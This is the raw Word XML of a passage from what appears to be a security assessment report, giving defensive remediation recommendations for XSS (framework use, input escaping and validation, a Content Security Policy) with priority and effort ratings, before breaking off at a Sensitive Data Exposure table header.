    <w:p w14:paraId="051ECCE3" w14:textId="77777777" w:rsidR="00B24DB9" w:rsidRDefault="00B24DB9" w:rsidP="00A94E9E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A6DA8A" w14:textId="77777777" w:rsidR="00B24DB9" w:rsidRDefault="00B24DB9" w:rsidP="00A94E9E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following are recommendations </w:t>
      </w:r>
      <w:r w:rsidR="00B323BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">by high-level category </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">resulting from the findings as listed </w:t>
      </w:r>
      <w:r w:rsidR="00A905F3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>above</w:t>
      </w:r>
      <w:r w:rsidR="006860F0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each lab and associated vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00977BB1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each recommendation has an associated priority and remediation effort (high, medium, and low). The effort is a high-level estimate which could change with more analysis. In overall terms, a lo</w:t>
      </w:r>
      <w:r w:rsidR="001D1887">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w effort denotes approximately 4-16</w:t>
      </w:r>
      <w:r w:rsidR="00977BB1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hours, me</w:t>
      </w:r>
      <w:r w:rsidR="001D1887">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dium effort is approximately (16</w:t>
      </w:r>
      <w:r w:rsidR="00977BB1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-40 hours), and high effort is greater than 40 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A8AD7" w14:textId="77777777" w:rsidR="00C96E0E" w:rsidRDefault="00C96E0E" w:rsidP="00C96E0E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E23926" w14:textId="1BE6E8AD" w:rsidR="00B323BE" w:rsidRDefault="00E713A0" w:rsidP="00B323BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc46402733"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B323BE">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="006860F0">
        <w:t xml:space="preserve">eb Application </w:t>
      </w:r>
      <w:r w:rsidR="00586449">
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r w:rsidR="006860F0">
        <w:t xml:space="preserve"> - XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="76B755EC" w14:textId="77777777" w:rsidR="00B323BE" w:rsidRDefault="00B323BE" w:rsidP="00B323BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20AB7852" w14:textId="77777777" w:rsidR="002469AF" w:rsidRDefault="002469AF" w:rsidP="00B323BE">
      <w:pP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1"/>
        <w:gridCol w:w="1437"/>
        <w:gridCol w:w="3012"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB073A" w:rsidRPr="009A5C68" w14:paraId="1755BE86" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="6D33AA3E" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="009A5C68" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A5C68">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="7216FF29" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="009A5C68" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A5C68">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="7747C4CC" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="009A5C68" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A5C68">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB073A" w:rsidRPr="009A5C68" w14:paraId="741A37D6" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="4F7ACA42" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00BB073A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BB073A" w:rsidRPr="00BB073A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="34AE2CEE" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="009A5C68" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="18FE6FF8" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB073A" w:rsidRPr="009A5C68" w14:paraId="1C8DCE4C" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CDCF62B" w14:textId="3F3E274E" w:rsidR="009A5C68" w:rsidRPr="00A454B1" w:rsidRDefault="00793E83" w:rsidP="009F7AFB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00793E83">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Using an appropriate framework such as Node js or React that </w:t>
            </w:r>
            <w:r w:rsidR="00A03B93">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>shield</w:t>
            </w:r>
            <w:r w:rsidRPr="00793E83">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> from XSS attacks.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> This may involve rescripting parts or the entire web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33DC98FA" w14:textId="468752D7" w:rsidR="009A5C68" w:rsidRPr="002469AF" w:rsidRDefault="00793E83" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30E581FE" w14:textId="7E7BB636" w:rsidR="009A5C68" w:rsidRPr="00793E83" w:rsidRDefault="000D46F8" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00793E83">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00793E83" w:rsidRPr="00793E83">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB8B893" w14:textId="77777777" w:rsidR="00A42012" w:rsidRPr="009A5C68" w:rsidRDefault="00A42012" w:rsidP="00002AE1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F27E0" w:rsidRPr="009A5C68" w14:paraId="7EFD6C1C" w14:textId="77777777" w:rsidTr="006860F0">
        <w:trPr>
          <w:trHeight w:val="476"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="07300CDC" w14:textId="77777777" w:rsidR="001F27E0" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5969FFD4" w14:textId="4429326E" w:rsidR="00717F46" w:rsidRPr="00C41698" w:rsidRDefault="00793E83" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Escaping unwanted characters in input fields that are used in HTTP requests. Additional character validation. Characters such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="var(--md-code-font-family)" w:hAnsi="var(--md-code-font-family)"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00793E83">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>space] % * + , - / ; &lt; = &gt; ^ and |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="var(--md-code-font-family)" w:hAnsi="var(--md-code-font-family)"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>should be escaped and have validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="528852CA" w14:textId="477BC8F5" w:rsidR="001F27E0" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000457C1">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="52DCE301" w14:textId="5FDC20D7" w:rsidR="001F27E0" w:rsidRPr="00C41698" w:rsidRDefault="00A03B93" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41698" w:rsidRPr="009A5C68" w14:paraId="765F7265" w14:textId="77777777" w:rsidTr="006860F0">
        <w:trPr>
          <w:trHeight w:val="350"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B296AB4" w14:textId="0DBCCB8E" w:rsidR="00C41698" w:rsidRPr="00C41698" w:rsidRDefault="000D46F8" w:rsidP="006C1486">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00793E83">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Developing a Content security policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5EEF5108" w14:textId="2C166EAE" w:rsidR="00C41698" w:rsidRPr="000457C1" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A03B93">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E04915A" w14:textId="77777777" w:rsidR="00C41698" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3048DD52" w14:textId="2887269C" w:rsidR="001F27E0" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F27E0" w:rsidRPr="009A5C68" w14:paraId="07F6320F" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="46B48434" w14:textId="77777777" w:rsidR="001F27E0" w:rsidRPr="00BB073A" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16408DF1" w14:textId="77777777" w:rsidR="001F27E0" w:rsidRPr="009A5C68" w:rsidRDefault="001F27E0" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="4592223A" w14:textId="77777777" w:rsidR="001F27E0" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="1237F672" w14:textId="77777777" w:rsidR="001F27E0" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42012" w:rsidRPr="009A5C68" w14:paraId="774D3716" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4235" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0AEB173C" w14:textId="77777777" w:rsidR="00717F46" w:rsidRDefault="00717F46" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77E70B98" w14:textId="77777777" w:rsidR="00A42012" w:rsidRPr="00455E18" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="75B4CC43" w14:textId="77777777" w:rsidR="00A42012" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3153" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="340D24E5" w14:textId="77777777" w:rsidR="00A42012" w:rsidRPr="009A5C68" w:rsidRDefault="000D46F8" w:rsidP="00B13939">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68473549" w14:textId="77777777" w:rsidR="009A5C68" w:rsidRDefault="00BB073A" w:rsidP="00BB073A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED419C0" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc46402734"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Web Application Recommendations - </w:t>
      </w:r>
      <w:r w:rsidR="00F63A7E">
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="79EC8143" w14:textId="77777777" w:rsidR="00B323BE" w:rsidRDefault="00B323BE" w:rsidP="00002AE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F417B67" w14:textId="77777777" w:rsidR="002469AF" w:rsidRDefault="002469AF" w:rsidP="00BB073A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="54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6"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="1668"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B7B87" w:rsidRPr="004B7B87" w14:paraId="1394BBB9" w14:textId="77777777" w:rsidTr="001F27E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="3E27FF87" w14:textId="77777777" w:rsidR="00BB073A" w:rsidRPr="004B7B87" w:rsidRDefault="00BB073A" w:rsidP="00017164">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
